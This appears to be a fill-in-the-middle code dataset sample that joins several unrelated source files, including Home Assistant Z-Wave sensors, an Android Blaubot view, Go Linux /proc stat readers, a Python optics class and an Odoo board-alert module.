BinarySensorDeviceClass.POWER, NOTIFICATION_SENSOR_ENABLED: False, NOTIFICATION_OFF_VALUE: None, }, { # Index 9: System - Value Id's 1, 2, 6, 7 NOTIFICATION_TYPE: ValueIndex.NOTIFICATION_SYSTEM, NOTIFICATION_VALUES: [1, 2, 6, 7], NOTIFICATION_DEVICE_CLASS: BinarySensorDeviceClass.PROBLEM, NOTIFICATION_SENSOR_ENABLED: False, }, { # Index 10: Emergency - Value Id's 1, 2, 3 NOTIFICATION_TYPE: ValueIndex.NOTIFICATION_EMERGENCY, NOTIFICATION_VALUES: [1, 2, 3], NOTIFICATION_DEVICE_CLASS: BinarySensorDeviceClass.PROBLEM, }, { # Index 11: Clock - Value Id's 1, 2 NOTIFICATION_TYPE: ValueIndex.NOTIFICATION_CLOCK, NOTIFICATION_VALUES: [1, 2], NOTIFICATION_DEVICE_CLASS: None, NOTIFICATION_SENSOR_ENABLED: False, }, { # Index 12: Appliance - All Value Id's NOTIFICATION_TYPE: ValueIndex.NOTIFICATION_APPLIANCE, NOTIFICATION_VALUES: [ 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, ], NOTIFICATION_DEVICE_CLASS: None, }, { # Index 13: Home Health - Value Id's 1,2,3,4,5 NOTIFICATION_TYPE: ValueIndex.NOTIFICATION_APPLIANCE, NOTIFICATION_VALUES: [1, 2, 3, 4, 5], NOTIFICATION_DEVICE_CLASS: None, }, { # Index 14: Siren NOTIFICATION_TYPE: ValueIndex.NOTIFICATION_SIREN, NOTIFICATION_VALUES: [1], NOTIFICATION_DEVICE_CLASS: BinarySensorDeviceClass.SOUND, }, { # Index 15: Water valve # ignore non-boolean values NOTIFICATION_TYPE: ValueIndex.NOTIFICATION_WATER_VALVE, NOTIFICATION_VALUES: [3, 4], NOTIFICATION_DEVICE_CLASS: BinarySensorDeviceClass.PROBLEM, }, { # Index 16: Weather NOTIFICATION_TYPE: ValueIndex.NOTIFICATION_WEATHER, NOTIFICATION_VALUES: [1, 2], NOTIFICATION_DEVICE_CLASS: BinarySensorDeviceClass.PROBLEM, }, { # Index 17: Irrigation # ignore non-boolean values NOTIFICATION_TYPE: ValueIndex.NOTIFICATION_IRRIGATION, NOTIFICATION_VALUES: [1, 2, 3, 4, 5], NOTIFICATION_DEVICE_CLASS: None, }, { # Index 18: Gas NOTIFICATION_TYPE: ValueIndex.NOTIFICATION_GAS, NOTIFICATION_VALUES: [1, 2, 3, 4], NOTIFICATION_DEVICE_CLASS: BinarySensorDeviceClass.GAS, }, { # Index 18: Gas NOTIFICATION_TYPE: ValueIndex.NOTIFICATION_GAS, NOTIFICATION_VALUES: [6], NOTIFICATION_DEVICE_CLASS: BinarySensorDeviceClass.PROBLEM, }, ] async def async_setup_entry( hass: HomeAssistant, config_entry: ConfigEntry, async_add_entities: AddEntitiesCallback, ) -> None: """Set up Z-Wave binary_sensor from config entry.""" @callback def async_add_binary_sensor(values): """Add Z-Wave Binary Sensor(s).""" async_add_entities(VALUE_TYPE_SENSORS[values.primary.type](values)) hass.data[DOMAIN][config_entry.entry_id][DATA_UNSUBSCRIBE].append( async_dispatcher_connect( hass, f"{DOMAIN}_new_{BINARY_SENSOR_DOMAIN}", async_add_binary_sensor ) ) @callback def async_get_legacy_binary_sensors(values): """Add Legacy/classic Z-Wave Binary Sensor.""" return [ZWaveBinarySensor(values)] @callback def async_get_notification_sensors(values): """Convert Notification values into binary sensors.""" sensors_to_add = [] for list_value in values.primary.value["List"]: # check if we have a mapping for this value for item in NOTIFICATION_SENSORS: if item[NOTIFICATION_TYPE] != values.primary.index: continue if list_value["Value"] not in item[NOTIFICATION_VALUES]: continue sensors_to_add.append( ZWaveListValueSensor( # required values values, list_value["Value"], item[NOTIFICATION_DEVICE_CLASS], # optional values item.get(NOTIFICATION_SENSOR_ENABLED, True), item.get(NOTIFICATION_OFF_VALUE, NOTIFICATION_VALUE_CLEAR), ) ) return sensors_to_add VALUE_TYPE_SENSORS = { ValueType.BOOL: async_get_legacy_binary_sensors, ValueType.LIST: async_get_notification_sensors, } class ZWaveBinarySensor(ZWaveDeviceEntity, BinarySensorEntity): """Representation of a Z-Wave binary_sensor.""" @property def is_on(self): """Return if the sensor is on or off.""" return self.values.primary.value @property def entity_registry_enabled_default(self) -> bool: """Return if the entity should be enabled when first added to the entity registry.""" # Legacy binary sensors are phased out (replaced by notification sensors) # Disable by default to not confuse users for item in self.values.primary.node.values(): if item.command_class == CommandClass.NOTIFICATION: # This device properly implements the Notification CC, legacy sensor can be disabled return False return True class ZWaveListValueSensor(ZWaveDeviceEntity, BinarySensorEntity): """Representation of a binary_sensor from values in the Z-Wave Notification CommandClass.""" def __init__( self, values, on_value, device_class=None, default_enabled=True, off_value=NOTIFICATION_VALUE_CLEAR, ): """Initialize a ZWaveListValueSensor entity.""" super().__init__(values) self._on_value = on_value self._device_class = device_class self._default_enabled = default_enabled self._off_value = off_value # make sure the correct value is selected at startup self._state = False self.on_value_update()<|fim▁hole|> @callback def on_value_update(self): """Call when a value is added/updated in the underlying EntityValues Collection.""" if self.values.primary.value["Selected_id"] == self._on_value: # Only when the active ID exactly matches our watched ON value, set sensor state to ON self._state = True elif self.values.primary.value["Selected_id"] == self._off_value: # Only when the active ID exactly matches our watched OFF value, set sensor state to OFF self._state = False elif ( self._off_value is None and self.values.primary.value["Selected_id"] != self._on_value ): # Off value not explicitly specified # Some values are reset by the simple fact they're overruled by another value coming in # For example the battery charging values in Power Management Index self._state = False @property def name(self): """Return the name of the entity.""" # Append value label to base name base_name = super().name value_label = "" for item in self.values.primary.value["List"]: if item["Value"] == self._on_value: value_label = item["Label"] break # Strip "on location" / "at location" from name # Note: We're assuming that we don't retrieve 2 values with different location value_label = value_label.split(" on ")[0] value_label = value_label.split(" at ")[0] return f"{base_name}: {value_label}" @property def unique_id(self): """Return the unique_id of the entity.""" unique_id = super().unique_id return f"{unique_id}.{self._on_value}" @property def is_on(self): """Return if the sensor is on or off.""" return self._state @property def device_class(self): """Return the class of this device, from component DEVICE_CLASSES.""" return self._device_class @property def entity_registry_enabled_default(self) -> bool: """Return if the entity should be enabled when first added to the entity registry.""" # We hide the more advanced sensors by default to not overwhelm users return self._default_enabled<|fim▁end|>
<|file_name|>depRepSpec.js<|end_file_name|><|fim▁begin|>#!/usr/bin/env node 'use strict'; var assert = require('assert'); var depRep = require('../../lib/depRep'); var oldJson = require('../fixtures/old.json'); var newJson = require('../fixtures/new.json'); var unsupported = require('../fixtures/unsupported.json'); function key(number, dev) { var prefix = "/dependencies/"; if (dev) prefix = "/devDependencies/"; return prefix + number; } describe('Compare', function () { // describe('#report()', function () { // it('should generate a proper report for dependencies', function () { // depRep // .report(oldJson, newJson) // .then(function () {<|fim▁hole|> // assert.equal(report[key(4)].status, null); // assert.equal(report[key(5)].status, null); // assert.equal(report[key(6)], null); // assert.equal(report[key(7)].status, null); // assert.equal(report[key(8)].status, "minor"); // assert.equal(report[key(9)].status, "major"); // done(); // }); // }); // }); // // describe('#report()', function () { // it('should generate a proper report for devDependencies', function () { // depRep // .report(oldJson, newJson) // .then(function () { // assert.equal(report[key(1, true)].status, "major"); // assert.equal(report[key(2, true)].status, null); // assert.equal(report[key(3, true)], null); // assert.equal(report[key(4, true)].status, null); // assert.equal(report[key(5, true)].status, null); // assert.equal(report[key(6, true)], null); // assert.equal(report[key(7, true)].status, null); // assert.equal(report[key(8, true)].status, "minor"); // assert.equal(report[key(9, true)].status, "major"); // done(); // }); // }); // }); });<|fim▁end|>
// assert.equal(analyze[key(1)].status, "major"); // assert.equal(report[key(2)].status, null); // assert.equal(report[key(3)], null);
<|file_name|>KingdomView.java<|end_file_name|><|fim▁begin|>package eu.hgross.blaubot.android.views; import android.content.Context; import android.graphics.drawable.Drawable; import android.os.Handler; import android.os.Looper; import android.util.AttributeSet; import android.view.View; import android.widget.ImageView; import android.widget.LinearLayout; import android.widget.TextView; import java.util.ArrayList; import java.util.List; import java.util.Map.Entry; import java.util.Set; import eu.hgross.blaubot.admin.AbstractAdminMessage; import eu.hgross.blaubot.admin.CensusMessage; import eu.hgross.blaubot.android.R; import eu.hgross.blaubot.core.Blaubot; import eu.hgross.blaubot.core.IBlaubotConnection; import eu.hgross.blaubot.core.State; import eu.hgross.blaubot.core.acceptor.IBlaubotConnectionManagerListener; import eu.hgross.blaubot.core.statemachine.IBlaubotConnectionStateMachineListener; import eu.hgross.blaubot.core.statemachine.states.IBlaubotState; import eu.hgross.blaubot.messaging.IBlaubotAdminMessageListener; import eu.hgross.blaubot.ui.IBlaubotDebugView; /** * Android view to display informations about the StateMachine's state. * * Add this view to a blaubot instance like this: stateView.registerBlaubotInstance(blaubot); * * @author Henning Gross {@literal ([email protected])} * */ public class KingdomView extends LinearLayout implements IBlaubotDebugView { private Handler mUiHandler; private Blaubot mBlaubot; private Context mContext; public KingdomView(Context context, AttributeSet attrs) { super(context, attrs); initView(context); } public KingdomView(Context context, AttributeSet attrs, int defStyle) { super(context, attrs, defStyle); initView(context); } private void initView(Context context) { this.mContext = context; mUiHandler = new Handler(Looper.getMainLooper()); } private final static String NO_CENSUS_MESSAGE_SO_FAR_TEXT = "Got no census message so far"; private void updateUI(final CensusMessage censusMessage) { mUiHandler.post(new Runnable() { @Override public void run() { final List<View> stateItems = new ArrayList<>(); if(censusMessage != null) { final Set<Entry<String, State>> entries = censusMessage.getDeviceStates().entrySet(); for(Entry<String, State> entry : entries) { final String uniqueDeviceId = entry.getKey(); final State state = entry.getValue(); View item = createKingdomViewListItem(mContext, state, uniqueDeviceId); stateItems.add(item); } } // Never got a message if(stateItems.isEmpty()) { TextView tv = new TextView(mContext); tv.setText(NO_CENSUS_MESSAGE_SO_FAR_TEXT); stateItems.add(tv); } removeAllViews(); for(View v : stateItems) { addView(v); } }<|fim▁hole|> * Creates a kingdom view list item * * @param context the context * @param state the state of the device to visualize * @param uniqueDeviceId the unique device id * @return the constructed view */ public static View createKingdomViewListItem(Context context, State state, String uniqueDeviceId) { final Drawable icon = ViewUtils.getDrawableForBlaubotState(context, state); View item = inflate(context, R.layout.blaubot_kingdom_view_list_item, null); TextView uniqueDeviceIdTextView = (TextView) item.findViewById(R.id.uniqueDeviceIdLabel); TextView stateTextView = (TextView) item.findViewById(R.id.stateLabel); ImageView iconImageView = (ImageView) item.findViewById(R.id.stateIcon); iconImageView.setImageDrawable(icon); uniqueDeviceIdTextView.setText(uniqueDeviceId); stateTextView.setText(state.toString()); return item; } private IBlaubotConnectionManagerListener mConnectionManagerListener = new IBlaubotConnectionManagerListener() { @Override public void onConnectionClosed(IBlaubotConnection connection) { } @Override public void onConnectionEstablished(IBlaubotConnection connection) { } }; private IBlaubotConnectionStateMachineListener mBlaubotConnectionStateMachineListener = new IBlaubotConnectionStateMachineListener() { @Override public void onStateChanged(IBlaubotState oldState, final IBlaubotState state) { if(State.getStateByStatemachineClass(state.getClass()) == State.Free) { updateUI(null); } } @Override public void onStateMachineStopped() { updateUI(null); } @Override public void onStateMachineStarted() { } }; private IBlaubotAdminMessageListener connectionLayerAdminMessageListener = new IBlaubotAdminMessageListener() { @Override public void onAdminMessage(AbstractAdminMessage adminMessage) { if(adminMessage instanceof CensusMessage) { updateUI((CensusMessage) adminMessage); } } }; /** * Register this view with the given blaubot instance * * @param blaubot * the blaubot instance to connect with */ @Override public void registerBlaubotInstance(Blaubot blaubot) { if (mBlaubot != null) { unregisterBlaubotInstance(); } this.mBlaubot = blaubot; this.mBlaubot.getConnectionStateMachine().addConnectionStateMachineListener(mBlaubotConnectionStateMachineListener); this.mBlaubot.getChannelManager().addAdminMessageListener(connectionLayerAdminMessageListener); this.mBlaubot.getConnectionManager().addConnectionListener(mConnectionManagerListener); // update updateUI(null); } @Override public void unregisterBlaubotInstance() { if(mBlaubot != null) { this.mBlaubot.getConnectionStateMachine().removeConnectionStateMachineListener(mBlaubotConnectionStateMachineListener); this.mBlaubot.getChannelManager().removeAdminMessageListener(connectionLayerAdminMessageListener); this.mBlaubot.getConnectionManager().removeConnectionListener(mConnectionManagerListener); } // force some updates updateUI(null); } }<|fim▁end|>
}); } /**
<|file_name|>perfmonger_linux.go<|end_file_name|><|fim▁begin|>// +build linux package subsystem import ( "bufio" "errors" "fmt" "io" "os" "os/exec" "runtime" "strconv" "strings" ) type PlatformHeader LinuxHeader func NewPlatformHeader() *LinuxHeader { header := new(LinuxHeader) header.Devices = make(map[string]LinuxDevice) header.getDevsParts() return header } func (header *LinuxHeader) getDevsParts() { f, err := os.Open("/proc/diskstats") if err != nil { panic(err) } defer f.Close() scan := bufio.NewScanner(f) for scan.Scan() { var major, minor int var name string c, err := fmt.Sscanf(scan.Text(), "%d %d %s", &major, &minor, &name)<|fim▁hole|> panic(err) } if c != 3 { continue } header.DevsParts = append(header.DevsParts, name) if isDevice(name) { header.Devices[name] = LinuxDevice{ name, getPartitions(name), } } } } func isDevice(name string) bool { stat, err := os.Stat(fmt.Sprintf("/sys/block/%s", name)) if err == nil && stat.IsDir() { return true } return false } func getPartitions(name string) []string { var dir *os.File var fis []os.FileInfo var err error var parts = []string{} dir, err = os.Open(fmt.Sprintf("/sys/block/%s", name)) if err != nil { panic(err) } fis, err = dir.Readdir(0) if err != nil { panic(err) } for _, fi := range fis { _, err := os.Stat(fmt.Sprintf("/sys/block/%s/%s/stat", name, fi.Name())) if err == nil { // partition exists parts = append(parts, fi.Name()) } } return parts } func ReadCpuStat(record *StatRecord) error { f, ferr := os.Open("/proc/stat") if ferr != nil { return ferr } defer f.Close() if record.Cpu == nil { num_core := 0 out, err := exec.Command("nproc", "--all").Output() out_str := strings.TrimSpace(string(out)) if err == nil { num_core, err = strconv.Atoi(out_str) if err != nil { num_core = 0 } } if num_core == 0 { num_core = runtime.NumCPU() } record.Cpu = NewCpuStat(num_core) } else { record.Cpu.Clear() } if record.Proc == nil { record.Proc = NewProcStat() } else { record.Proc.Clear() } scan := bufio.NewScanner(f) for scan.Scan() { var err error var cpu string line := scan.Text() if line[0:4] == "cpu " { // Linux 2.6.33 or later _, err = fmt.Sscanf(line, "%s %d %d %d %d %d %d %d %d %d %d", &cpu, &record.Cpu.All.User, &record.Cpu.All.Nice, &record.Cpu.All.Sys, &record.Cpu.All.Idle, &record.Cpu.All.Iowait, &record.Cpu.All.Hardirq, &record.Cpu.All.Softirq, &record.Cpu.All.Steal, &record.Cpu.All.Guest, &record.Cpu.All.GuestNice) if err == io.EOF { // Linux 2.6.24 or later _, err = fmt.Sscanf(line, "%s %d %d %d %d %d %d %d %d %d", &cpu, &record.Cpu.All.User, &record.Cpu.All.Nice, &record.Cpu.All.Sys, &record.Cpu.All.Idle, &record.Cpu.All.Iowait, &record.Cpu.All.Hardirq, &record.Cpu.All.Softirq, &record.Cpu.All.Steal, &record.Cpu.All.Guest) record.Cpu.All.GuestNice = 0 } if err != nil { panic(err) } } else if line[0:3] == "cpu" { var n_core int var core_stat *CpuCoreStat // assume n_core < 10000 _, err = fmt.Sscanf(line[3:7], "%d", &n_core) if err != nil { panic(err) } core_stat = &record.Cpu.CoreStats[n_core] // Linux 2.6.33 or later _, err = fmt.Sscanf(line, "%s %d %d %d %d %d %d %d %d %d %d", &cpu, &core_stat.User, &core_stat.Nice, &core_stat.Sys, &core_stat.Idle, &core_stat.Iowait, &core_stat.Hardirq, &core_stat.Softirq, &core_stat.Steal, &core_stat.Guest, &core_stat.GuestNice) if err == io.EOF { // Linux 2.6.24 or later _, err = fmt.Sscanf(line, "%s %d %d %d %d %d %d %d %d %d", &cpu, &core_stat.User, &core_stat.Nice, &core_stat.Sys, &core_stat.Idle, &core_stat.Iowait, &core_stat.Hardirq, &core_stat.Softirq, &core_stat.Steal, &core_stat.Guest) } if err != nil { panic(err) } } else if line[0:5] == "ctxt " { _, err = fmt.Sscanf(line[4:], "%d", &record.Proc.ContextSwitch) if err != nil { panic(err) } } else if line[0:10] == "processes " { _, err = fmt.Sscanf(line[10:], "%d", &record.Proc.Fork) if err != nil { panic(err) } } } return nil } func parseInterruptStatEntry(line string, num_core int) (*InterruptStatEntry, error) { entry := new(InterruptStatEntry) entry.NumCore = num_core entry.IntrCounts = make([]int, num_core) tokens := strings.Fields(line) idx := 0 tok := tokens[0] tok = strings.TrimRight(tok, ":") if irqno, err := strconv.Atoi(tok); err == nil { entry.IrqNo = irqno entry.IrqType = "" } else { entry.IrqNo = -1 entry.IrqType = tok } for idx := 1; idx < num_core+1; idx += 1 { var c int var err error if idx >= len(tokens) { break } tok = tokens[idx] if c, err = strconv.Atoi(tok); err != nil { return nil, errors.New("Invalid string for IntrCounts element: " + tok) } entry.IntrCounts[idx-1] = c } idx = num_core + 1 if idx < len(tokens) { entry.Descr = strings.Join(tokens[idx:], " ") } else { entry.Descr = "" } return entry, nil } func ReadInterruptStat(record *StatRecord) error { intr_stat := NewInterruptStat() if record == nil { return errors.New("Valid *StatRecord is required.") } f, err := os.Open("/proc/interrupts") if err != nil { panic(err) } defer f.Close() scan := bufio.NewScanner(f) if !scan.Scan() { return errors.New("/proc/interrupts seems to be empty") } cores := strings.Fields(scan.Text()) num_core := len(cores) for scan.Scan() { entry, err := parseInterruptStatEntry(scan.Text(), num_core) if err != nil { return err } intr_stat.Entries = append(intr_stat.Entries, entry) intr_stat.NumEntries += 1 } record.Interrupt = intr_stat return nil } func ReadDiskStats(record *StatRecord, targets *map[string]bool) error { if record == nil { return errors.New("Valid *StatRecord is required.") } f, ferr := os.Open("/proc/diskstats") if ferr != nil { panic(ferr) } defer f.Close() if record.Disk == nil { record.Disk = NewDiskStat() } else { record.Disk.Clear() } scan := bufio.NewScanner(f) var num_items int var err error for scan.Scan() { var rdmerge_or_rdsec int64 var rdsec_or_wrios int64 var rdticks_or_wrsec int64 line := scan.Text() entry := NewDiskStatEntry() num_items, err = fmt.Sscanf(line, "%d %d %s %d %d %d %d %d %d %d %d %d %d %d", &entry.Major, &entry.Minor, &entry.Name, &entry.RdIos, &rdmerge_or_rdsec, &rdsec_or_wrios, &rdticks_or_wrsec, &entry.WrIos, &entry.WrMerges, &entry.WrSectors, &entry.WrTicks, &entry.IosPgr, &entry.TotalTicks, &entry.ReqTicks) if err != nil { return err } if num_items == 14 { entry.RdMerges = rdmerge_or_rdsec entry.RdSectors = rdsec_or_wrios entry.RdTicks = rdticks_or_wrsec } else if num_items == 7 { entry.RdSectors = rdmerge_or_rdsec entry.WrIos = rdsec_or_wrios entry.WrSectors = rdticks_or_wrsec } else { continue } if entry.RdIos == 0 && entry.WrIos == 0 { continue } if targets != nil { if _, ok := (*targets)[entry.Name]; !ok { // device not in targets continue } } else { if !isDevice(entry.Name) { continue } } record.Disk.Entries = append(record.Disk.Entries, entry) } return nil } func ReadNetStat(record *StatRecord) error { if record == nil { return errors.New("Valid *StatRecord is required.") } net_stat := NewNetStat() f, err := os.Open("/proc/net/dev") if err != nil { return err } defer f.Close() scanner := bufio.NewScanner(f) for scanner.Scan() { line := scanner.Text() switch { case line[0:7] == "Inter-|": continue case line[0:7] == " face |": continue } line = strings.Replace(line, ":", " ", -1) e := NewNetStatEntry() var devname string n, err := fmt.Sscanf(line, "%s %d %d %d %d %d %d %d %d %d %d %d %d %d %d %d %d", &devname, &e.RxBytes, &e.RxPackets, &e.RxErrors, &e.RxDrops, &e.RxFifo, &e.RxFrame, &e.RxCompressed, &e.RxMulticast, &e.TxBytes, &e.TxPackets, &e.TxErrors, &e.TxDrops, &e.TxFifo, &e.TxFrame, &e.TxCompressed, &e.TxMulticast) if err == io.EOF { break } else if err != nil { return err } if n != 17 { continue } // trim trailing ":" from devname if devname[len(devname)-1] == ':' { devname = devname[0 : len(devname)-1] } e.Name = devname net_stat.Entries = append(net_stat.Entries, e) } record.Net = net_stat return nil } func ReadMemStat(record *StatRecord) error { if record == nil { return errors.New("Valid *StatRecord is required.") } mem_stat := NewMemStat() f, err := os.Open("/proc/meminfo") if err != nil { return err } defer f.Close() scanner := bufio.NewScanner(f) for scanner.Scan() { var key string var val int64 line := scanner.Text() n, err := fmt.Sscanf(line, "%s %d", &key, &val) if err == io.EOF { break } else if err != nil { return err } if n != 2 { continue } switch key { case "HugePages_Surp:": mem_stat.HugePages_Surp = val case "HugePages_Rsvd:": mem_stat.HugePages_Rsvd = val case "HugePages_Free:": mem_stat.HugePages_Free = val case "HugePages_Total:": mem_stat.HugePages_Total = val case "Hugepagesize:": mem_stat.Hugepagesize = val case "AnonHugePages:": mem_stat.AnonHugePages = val case "Committed_AS:": mem_stat.Committed_AS = val case "CommitLimit:": mem_stat.CommitLimit = val case "Bounce:": mem_stat.Bounce = val case "NFS_Unstable:": mem_stat.NFS_Unstable = val case "Shmem:": mem_stat.Shmem = val case "Slab:": mem_stat.Slab = val case "SReclaimable:": mem_stat.SReclaimable = val case "SUnreclaim:": mem_stat.SUnreclaim = val case "KernelStack:": mem_stat.KernelStack = val case "PageTables:": mem_stat.PageTables = val case "Mapped:": mem_stat.Mapped = val case "AnonPages:": mem_stat.AnonPages = val case "Writeback:": mem_stat.Writeback = val case "Dirty:": mem_stat.Dirty = val case "SwapFree:": mem_stat.SwapFree = val case "SwapTotal:": mem_stat.SwapTotal = val case "Inactive:": mem_stat.Inactive = val case "Active:": mem_stat.Active = val case "SwapCached:": mem_stat.SwapCached = val case "Cached:": mem_stat.Cached = val case "Buffers:": mem_stat.Buffers = val case "MemFree:": mem_stat.MemFree = val case "MemTotal:": mem_stat.MemTotal = val } } record.Mem = mem_stat return nil }<|fim▁end|>
if err != nil {
<|file_name|>special.py<|end_file_name|><|fim▁begin|>'''Defines the Special class for theia.''' # Provides: # class Special # __init__ # lines import numpy as np from ..helpers import geometry, settings from ..helpers.units import deg, cm, pi from .optic import Optic class Special(Optic): ''' Special class. This class represents general optics, as their actions on R and T are left to the user to input. They are useful for special optics which are neither reflective nor transmissive. Actions: * T on HR: user input * R on HR: user input * T on AR: user input * R on AR: user input **Note**: by default the actions of these objects are those of beamsplitters (0, 0, 0, 0) *=== Additional attributes with respect to the Optic class ===* <|fim▁hole|> *=== Name ===* Special **Note**: the curvature of any surface is positive for a concave surface (coating inside the sphere). Thus kurv*HRNorm/|kurv| always points to the center of the sphere of the surface, as is the convention for the lineSurfInter of geometry module. Same for AR. ******* HRK > 0 and ARK > 0 ******* HRK > 0 and ARK < 0 ***** ******** and |ARK| > |HRK| H***A H*********A ***** ******** ******* ******* ''' Name = "Special" def __init__(self, Wedge = 0., Alpha = 0., X = 0., Y = 0., Z = 0., Theta = pi/2., Phi = 0., Diameter = 10.e-2, HRr = .99, HRt = .01, ARr = .1, ARt = .9, HRK = 0.01, ARK = 0, Thickness = 2.e-2, N = 1.4585, KeepI = False, RonHR = 0, TonHR = 0, RonAR = 0, TonAR = 0, Ref = None): '''Special optic initializer. Parameters are the attributes. Returns a special optic. ''' # actions TonHR = int(TonHR) RonHR = int(RonHR) TonAR = int(TonAR) RonAR = int(RonAR) # Initialize input data N = float(N) Wedge = float(Wedge) Alpha = float(Alpha) Theta = float(Theta) Phi = float(Phi) Diameter = float(Diameter) Thickness = float(Thickness) HRK = float(HRK) ARK = float(ARK) HRt = float(HRt) HRr = float(HRr) ARt = float(ARt) ARr = float(ARr) #prepare for mother initializer HRNorm = np.array([np.sin(Theta)*np.cos(Phi), np.sin(Theta) * np.sin(Phi), np.cos(Theta)], dtype = np.float64) HRCenter = np.array([X, Y, Z], dtype = np.float64) #Calculate ARCenter and ARNorm with wedge and alpha and thickness: ARCenter = HRCenter\ - (Thickness + .5 * np.tan(Wedge) * Diameter) * HRNorm a,b = geometry.basis(HRNorm) ARNorm = -np.cos(Wedge) * HRNorm\ + np.sin(Wedge) * (np.cos(Alpha) * a\ + np.sin(Alpha) * b) super(Special, self).__init__(ARCenter = ARCenter, ARNorm = ARNorm, N = N, HRK = HRK, ARK = ARK, ARr = ARr, ARt = ARt, HRr = HRr, HRt = HRt, KeepI = KeepI, HRCenter = HRCenter, HRNorm = HRNorm, Thickness = Thickness, Diameter = Diameter, Wedge = Wedge, Alpha = Alpha, TonHR = TonHR, RonHR = RonHR, TonAR = TonAR, RonAR = RonAR, Ref = Ref) #Warnings for console output if settings.warning: self.geoCheck("mirror") def lines(self): '''Returns the list of lines necessary to print the object.''' sph = geometry.rectToSph(self.HRNorm) return ["Special: %s {" % str(self.Ref), "TonHR, RonHR: %s, %s" % (str(self.TonHR), str(self.RonHR)), "TonAR, RonAR: %s, %s" % (str(self.TonAR), str(self.RonAR)), "Thick: %scm" % str(self.Thick/cm), "Diameter: %scm" % str(self.Dia/cm), "Wedge: %sdeg" % str(self.Wedge/deg), "Alpha: %sdeg" % str(self.Alpha/deg), "HRCenter: %s" % str(self.HRCenter), "HRNorm: (%s, %s)deg" % (str(sph[0]/deg), str(sph[1]/deg)), "Index: %s" %str(self.N), "HRKurv, ARKurv: %s, %s" % (str(self.HRK), str(self.ARK)), "HRr, HRt, ARr, ARt: %s, %s, %s, %s" \ % (str(self.HRr), str(self.HRt), str(self.ARr), str(self.ARt)), "}"]<|fim▁end|>
None
<|file_name|>board_alerts.py<|end_file_name|><|fim▁begin|>############################################################################### # # OpenERP, Open Source Management Solution # Copyright (C) 2013, 2015 XCG Consulting (http://www.xcg-consulting.fr/) # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU Affero General Public License as # published by the Free Software Foundation, either version 3 of the # License, or (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU Affero General Public License for more details. # # You should have received a copy of the GNU Affero General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. # ############################################################################### from ast import literal_eval import datetime from lxml import etree from openerp import exceptions from openerp import SUPERUSER_ID from openerp.osv import orm from openerp.tools import DEFAULT_SERVER_DATE_FORMAT from openerp.tools import DEFAULT_SERVER_DATETIME_FORMAT from openerp.tools.translate import _ class board_alerts(orm.Model): """Inherit from res.users to allow sending email alerts.""" _inherit = 'res.users' def send_board_alerts(self, cr, uid, context=None): """Find users and send them their board alerts. """ data_obj = self.pool['ir.model.data'] email_template_obj = self.pool['email.template'] # Get our email template, referenced by its XML ID. email_template_id = data_obj.get_object( cr, SUPERUSER_ID, 'board_alerts', 'board_alerts_email_template', context=context ).id # Loop through all users; send them an email. for user_id in self.search(cr, SUPERUSER_ID, [], context=context): # Don't send an email when there is no content. contents = self.get_board_alert_contents( cr, uid, [user_id], context ) if not contents: continue # Fill the context to avoid computing contents twice. email_context = context.copy() if context else {} email_context['board_alert_contents'] = contents email_template_obj.send_mail( cr, SUPERUSER_ID, email_template_id, user_id, context=email_context ) def get_board_alert_contents(self, cr, uid, ids, context=None):<|fim▁hole|> """Get the HTML content to be put inside a board alert email. A board is stored as a custom view; read it, find the actions it points to, get the models and views referenced by these actions and fetch the data. @rtype: String if there is content, else None. """ if not isinstance(ids, list): ids = [ids] if len(ids) != 1: raise exceptions.Warning( 'board_alerts: Only 1 ID expected in the ' '"get_board_alert_contents" function.' ) uid = ids[0] if not context: context = {} prev_contents = context.get('board_alert_contents') if prev_contents: return prev_contents context = self._default_context(cr, uid, context) # Only users in the base "employee" group can see boards, so only they # can receive board alerts. if not self.user_has_groups( cr, uid, 'base.group_user', context=context ): return act_window_obj = self.pool['ir.actions.act_window'] board_obj = self.pool['board.board'] data_obj = self.pool['ir.model.data'] param_obj = self.pool['ir.config_parameter'] view_obj = self.pool['ir.ui.view'] # Boards are stored as views; get the one referenced by the XML ID. board_view = data_obj.get_object( cr, uid, 'board_alerts', 'alert_board', context=context ) # Set up the link that will be inserted in emails. board_link = param_obj.get_param( cr, uid, 'web.base.url', context=context ) if board_link: board_link += '/?db=%s#action=%s' % ( cr.dbname, str(data_obj.get_object( cr, uid, 'board_alerts', 'action_alert_board', context=context ).id) ) # Get the "custom view" representing the board. board = board_obj.fields_view_get( cr, uid, view_id=board_view.id, context=context ) to_send = [] # Loop through "action" tags stored inside this custom view. tree = etree.fromstring(board['arch']) for action in tree.xpath('//action'): if action.attrib['view_mode'] != 'list': # Only care about lists for now. continue view_type = 'tree' # Interpret the attributes of the current "action" tag. act_id = int(action.attrib['name']) act_domain = literal_eval(action.attrib['domain']) act_context = literal_eval(action.attrib['context']) act_title = action.attrib['string'] # Get the action object pointed to by this "action" tag. act_window = act_window_obj.browse( cr, uid, act_id, context=context ) # Get the model referenced by this "action" tag. act_model = self.pool.get(act_window.res_model) # Find the view referenced by this "action" tag; we take the first # view that matches, which is correct as they are ordered by # priority. act_view_id = view_obj.search( cr, uid, [ ('model', '=', act_window.res_model), ('type', '=', view_type), ], limit=1, context=act_context, )[0] act_view = act_model.fields_view_get( cr, uid, view_id=act_view_id, view_type=view_type, context=act_context ) # Get the fields required by the view. Use this method so that the # result is similar to what the user sees in her board. act_tree = etree.fromstring(act_view['arch']) fields = [ field.attrib['name'] for field in act_tree.xpath('//field') if not field.attrib.get('invisible') ] fields_info = act_model.fields_get( cr, uid, fields, context=context ) # Get data IDs, according to the domain & context defined in the # action. content_ids = act_model.search( cr, uid, act_domain, context=act_context ) # Add field names at the top of the list. contents = [[fields_info[field]['string'] for field in fields]] # Fetch the data content_data_list = act_model.browse( cr, uid, content_ids, context=act_context ) or [] contents += [ [ self._format_content( getattr(content_data, field), fields_info[field], context ) for field in fields ] for content_data in content_data_list ] # Do not send empty content if not contents: # XXX Maybe change to a message. # XXX Probably add an option to send the message or not continue to_send.append((act_title, contents)) if not to_send: return return self._data_list_to_email_html(to_send, board_link, context) def _data_list_to_email_html(self, data_list, board_link, context): """Convert a data list to HTML code suitable for an email. @rtype: String. """ # The "context" parameter is required for translations to work. root = etree.Element('div') if board_link: link = 